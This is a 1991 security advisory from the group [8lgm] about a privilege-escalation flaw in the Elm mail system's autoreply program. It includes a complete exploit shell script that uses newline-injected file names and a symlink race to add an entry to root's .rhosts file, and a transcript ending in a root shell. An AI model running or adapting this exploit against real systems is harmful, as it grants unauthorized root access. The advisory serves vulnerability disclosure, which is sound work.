
This advisory has been sent to:

	comp.security.unix
	INFOHAX			<infohax-emergency@stormking.com>
	BUGTRAQ			<chasin@crimelab.com>
	CERT/CC			<cert@cert.org>
	Elm Maintainers		<elm@DSI.COM>

===========================================================================
		[8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991

PROGRAM:

	autoreply(1)	(/usr/local/bin/autoreply)
			Supplied with the Elm Mail System

VULNERABLE OS's:

	Any system with a standard installation of The Elm Mail System.
	All versions are believed to have this vulnerability.

DESCRIPTION:

	autoreply(1) can be used to create root owned files, with mode
	666.  It can also overwrite any file with semi user-controlled
	data.

IMPACT:

	Any user with access to autoreply(1) can alter system files and
	thus become root.

REPEAT BY:

	This example demonstrates how to become root on most affected
	machines by modifying root's .rhosts file.  Please do not do
	this unless you have permission.

	Create the following script, 'fixrhosts':

8<--------------------------- cut here ----------------------------
#!/bin/sh
#
# fixrhosts rhosts-file user machine
#
if [ $# -ne 3 ]; then
	echo "Usage: `basename $0` rhosts-file user machine"
	exit 1
fi
RHOSTS="$1"
USERNAME="$2"
MACHINE="$3"
cd $HOME
echo x > "a
$MACHINE $USERNAME
b"
umask 022
autoreply "a
$MACHINE $USERNAME
b"
cat > /tmp/.rhosts.sh.$$ << 'EOF'
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
exec autoreply off
exit 0
EOF
/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
rm -f /tmp/.rhosts.sh.$$ "a
$MACHINE $USERNAME
b"
exit 0
8<--------------------------- cut here ----------------------------

	(Lines marked with > represent user input)

>	% id
	uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
>	% ./fixrhosts ~root/.rhosts 8lgm localhost
	You've been added to the autoreply system.
	You've been removed from the autoreply table.
>	% rsh localhost -l root csh -i
	Warning: no access to tty.
	Thus no job control in this shell.
	# 

	
FIX:

	1. Disable autoreply.
	2. Wait for a patch from the Elm maintainers.


FEEDBACK AND CONTACT INFORMATION:

	8lgm-bugs@bagpuss.demon.co.uk		(To report security flaws)

	8lgm-request@bagpuss.demon.co.uk	(Request for [8lgm] Advisories)

	8lgm@bagpuss.demon.co.uk		(General enquiries)

	System Administrators are encouraged to contact us for any
	other information they may require about the problems described
	in this advisory.

	We welcome reports about which platforms this flaw does or does
	not exist on.

===========================================================================


